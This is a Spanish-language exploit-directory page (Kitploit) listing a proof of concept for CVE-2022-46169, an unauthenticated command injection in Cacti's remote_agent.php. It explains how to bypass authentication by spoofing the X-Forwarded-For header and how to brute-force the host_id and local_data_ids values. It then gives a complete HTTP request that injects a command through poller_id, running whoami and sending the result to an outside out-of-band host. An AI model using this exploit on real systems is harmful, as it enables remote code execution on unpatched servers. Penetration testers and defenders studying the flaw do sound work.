Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-46169 — CVE-2022-46169 Cacti remote_agent.php Inyección de comandos no autenticada. | Kitploit
Herramientas/GitHubGitHub/0xf4n9x/cve-2022-46169
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAutenticación
GitHub0xf4n9x/cve-2022-46169

CVE-2022-46169

CVE-2022-46169 Cacti remote_agent.php Inyección de comandos no autenticada.

Ver Repositorio
47122hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-46169

CVE-2022-46169 Inyección de comandos no autenticada en remote_agent.php de Cacti.

Omisión de autenticación

Agregue el encabezado X-Forwarded-For para omitir la autenticación, tenga en cuenta que su valor no es fijo.

imagen

imagen

Fuerza bruta

Use Burp Intruder para realizar pruebas de fuzzing con los valores de host_id y local_data_ids.

imagen

imagen

RCE

El punto de inyección de comandos es el parámetro poller_id.

root@kitploit:~
GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20`whoami`.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun&host_id=2&local_data_ids[]=6 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1


imagen

Referencia

  • https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
Descargar herramienta